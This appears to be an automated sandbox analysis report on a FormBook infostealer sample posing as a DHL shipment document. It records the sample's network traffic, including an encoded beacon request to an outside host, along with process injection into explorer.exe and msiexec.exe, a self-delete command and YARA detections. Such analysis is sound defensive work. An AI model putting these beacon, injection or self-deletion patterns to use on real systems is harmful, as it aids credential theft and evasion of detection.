                            Data Raw: 34 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 61 75 63 74 69 6f 6e 73 2e 65 6d 61 69 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 20 20 20 20 20 20 20 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 20 20 20 20 20 20 20 20 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 20 20 20 20 20 20 20 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 20 20 20 20 20 20 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 20 20 20 20 20 20 20 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 20 20 20 20 20 20 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 20 20 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 20 20 20 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 5c 2f 5c 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63
                            Data Ascii: 402<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>auctions.email</title> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"> <style> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } body { overflow: hidden; } </style></head><body><div id="partner"></div><script> document.write( '<script src="\/\/sedoparking.c
                            Feb 8, 2022 11:23:24.565593958 CET9689INData Raw: 6f 6d 2f 66 72 6d 70 61 72 6b 2f 61 75 63 74 69 6f 6e 73 2e 65 6d 61 69 6c 2f 73 65 64 6f 70 61 72 6b 2f 70 61 72 6b 2e 6a 73 22 3e 27 20 2b 0a 20 20 20 20 20 20 20 20 27 3c 5c 2f 73 63 72 69 70 74 3e 27 0a 20 20 20 20 29 3b 0a 3c 2f 73 63 72 69
                            Data Ascii: om/frmpark/auctions.email/sedopark/park.js">' + '<\/script>' );</script></body></html>
                            Feb 8, 2022 11:23:24.565610886 CET9689INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.44984181.169.145.7280C:\Windows\explorer.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2022 11:23:34.665507078 CET9699OUTGET /how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.solatopotato.com
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
                            Feb 8, 2022 11:23:35.477914095 CET9701INHTTP/1.1 404 Not Found
                            Date: Tue, 08 Feb 2022 10:23:34 GMT
                            Server: Apache/2.4.52 (Unix)
                            X-Powered-By: PHP/7.4.27
                            X-UA-Compatible: IE=edge
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://solpotato.com/wp-json/>; rel="https://api.w.org/"
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                            Transfer-Encoding: chunked
                            Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 26 23 38 32 31 31 3b 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 2d 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 53 6f 6c 61 74 6f 20 50 6f 74 61 74 6f 20 2d 20 4c 65 67 65 6e 64 61 72 79 20 53 6f 6c 61 6e 61 20 50 6f 74 61 74 6f 65 73 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 64 63 61 73 74 20 46 65 65 64 3a 20 20 28 4d 50 33 20 46 65 65 64 29 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 6f 6c 70 6f 74 61 74 6f 2e 63 6f 6d 2f 66 65 65 64 2f 6d 70 33 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73
                            Data Ascii: 2000<!DOCTYPE html><html class="html" lang="de-DE"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; Solato Potato &#8211; Legendary Solana Potatoes</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//solpotato.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Solato Potato - Legendary Solana Potatoes &raquo; Feed" href="http://solpotato.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Solato Potato - Legendary Solana Potatoes &raquo; Kommentar-Feed" href="http://solpotato.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Podcast Feed: (MP3 Feed)" href="http://solpotato.com/feed/mp3/" /><script>window._wpemojiSettings = {"baseUrl":"https
                            Feb 8, 2022 11:23:35.477952957 CET9702INData Raw: 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 31 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c
                            Data Ascii: :\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/solpotato.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9
                            Feb 8, 2022 11:23:35.477981091 CET9703INData Raw: 5d 2c 5b 31 30 30 38 34 2c 36 35 30 33 39 2c 38 32 30 33 2c 35 35 33 35 37 2c 35 36 36 31 33 5d 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73
                            Data Ascii: ],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=
                            Feb 8, 2022 11:23:35.478003979 CET9705INData Raw: 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 70 6f 64 6c 6f 76 65 2d 70 6f 64 63 61 73 74 69 6e 67 2d 70 6c 75 67 69 6e 2d 66 6f 72 2d 77 6f 72 64 70 72 65 73 73 2f 63 73 73 2f 61 64 6d 69 6e 2d 66 6f 6e 74 2e 63 73 73 3f 76 65 72 3d 33 2e 37 2e
                            Data Ascii: ontent/plugins/podlove-podcasting-plugin-for-wordpress/css/admin-font.css?ver=3.7.2' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='http://solpotato.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=12.
                            Feb 8, 2022 11:23:35.478032112 CET9706INData Raw: 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38
                            Data Ascii: een-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--pres
                            Feb 8, 2022 11:23:35.478058100 CET9707INData Raw: 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 64 61 72 6b 2d 67 72 61 79 73 63 61 6c 65 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 64 61 72 6b 2d 67 72 61 79
                            Data Ascii: 0,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duoto
                            Feb 8, 2022 11:23:35.478081942 CET9709INData Raw: 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72
                            Data Ascii: lor--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color
                            Feb 8, 2022 11:23:35.478106976 CET9710INData Raw: 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                            Data Ascii: ant;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-ba
                            Feb 8, 2022 11:23:35.478131056 CET9712INData Raw: 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69
                            Data Ascii: olor{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(-
                            Feb 8, 2022 11:23:35.478153944 CET9713INData Raw: 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 6f 63 65 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62
                            Data Ascii: preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !i


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:11:21:34
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\DHL Shipment doc.exe"
                            Imagebase:0xee0000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            General

                            Target ID:1
                            Start time:11:21:40
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Imagebase:0x3f0000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:3
                            Start time:11:21:42
                            Start date:08/02/2022
                            Path:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\DHL Shipment doc.exe
                            Imagebase:0x930000
                            File size:550912 bytes
                            MD5 hash:4F0D2852D2AAD43EDDF9416661933701
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low

                            General

                            Target ID:6
                            Start time:11:21:46
                            Start date:08/02/2022
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff6fee60000
                            File size:3933184 bytes
                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:high

                            General

                            Target ID:10
                            Start time:11:22:30
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\autoconv.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\SysWOW64\autoconv.exe
                            Imagebase:0x300000
                            File size:851968 bytes
                            MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:11
                            Start time:11:22:31
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\msiexec.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                            Imagebase:0xec0000
                            File size:59904 bytes
                            MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:high

                            General

                            Target ID:15
                            Start time:11:22:36
                            Start date:08/02/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:16
                            Start time:11:22:37
                            Start date:08/02/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:9.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:116
                              Total number of Limit Nodes:13
                              execution_graph 14155 19078a0 14156 19078b6 14155->14156 14159 1906d24 14156->14159 14158 1907925 14160 1906d2f 14159->14160 14163 1906d54 14160->14163 14162 1907a02 14162->14158 14164 1906d5f 14163->14164 14167 1906d84 14164->14167 14166 1907b02 14166->14162 14168 1906d8f 14167->14168 14169 190821e 14168->14169 14173 190a158 14168->14173 14170 190825c 14169->14170 14177 190c298 14169->14177 14170->14166 14183 190a18f 14173->14183 14187 190a190 14173->14187 14174 190a16e 14174->14169 14178 190c244 14177->14178 14179 190c29e 14177->14179 14178->14170 14180 190c2ed 14179->14180 14219 190c458 14179->14219 14223 190c448 14179->14223 14180->14170 14184 190a19f 14183->14184 14191 190a277 14183->14191 14199 190a288 14183->14199 14184->14174 14189 190a277 2 API calls 14187->14189 14190 190a288 2 API calls 14187->14190 14188 190a19f 14188->14174 14189->14188 14190->14188 14192 190a29b 14191->14192 14193 190a2b3 14192->14193 14207 190a510 14192->14207 14211 190a500 14192->14211 14193->14184 14194 190a2ab 14194->14193 14195 